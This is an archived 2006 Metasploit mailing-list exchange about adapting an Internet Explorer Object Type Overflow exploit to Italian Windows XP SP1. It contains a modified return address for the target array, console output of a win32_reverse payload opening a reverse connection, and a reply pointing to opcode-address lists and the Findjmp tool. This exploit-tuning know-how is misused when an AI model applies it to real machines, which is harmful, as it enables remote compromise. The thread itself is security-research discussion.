[framework] Internet Explorer Object Type Overflow

Jerome Athias jerome.athias at free.fr
Wed May 31 04:45:20 CDT 2006


Hi,

you can find some useful addresses here:
https://www.securinfos.info/international-opcodes/index.php

you can also use this tool:
https://www.securinfos.info/outils-securite-hacking/Findjmp2.zip

and an example of exploitation on the Windows platform:
http://www.hackingdefined.com/index.php/Savant_Buffer_Overflow

/JA

Angelo Dell'Aera wrote:
> Hello,
> first of all I have to say I'm not a real expert in the Windows world.
> While trying to exploit the Internet Explorer Object Type Overflow on a
> host running Windows XP Professional SP1 through Metasploit, I realized
> that the ws2_32 push esp/ret (which is located at 0x71ab1d54 for the
> English version) is located at 0x71a31d54 for the Italian version, so
> I modified ie_objecttype.pm this way:
>
> "Windows XP"   => [ 0x71a31d54, 0x7ffdec50 ], # ws2_32 push esp/ret SP0/1
>
> When I tried to exploit the vulnerable host, I saw IE crashing and, on
> the attacker's side, this behavior...
>
> msf ie_objecttype(win32_reverse) > exploit
> [*] Starting Reverse Handler.
> [*] Waiting for connections to http://192.168.33.162:8080 ...
> [*] HTTP Client connected from 192.168.33.107:1392 using Windows XP,
> sending payload... 
> [*] Got connection from 192.168.33.162:4321 <-> 192.168.33.107:1393
>
> [*] Exiting Reverse Handler.
>
> I tried attaching to iexplore.exe with OllyDbg and observed an access
> violation when writing to the address 0x77e40000 (this address is in
> ECX and EBX when the access violation is triggered). I suppose I'll
> need to modify the second address in the target array as well in order
> to exit in a clean way, but I'm really not skilled in the Windows world,
> so hints about how to do it are really welcome.
>
> Regards,
>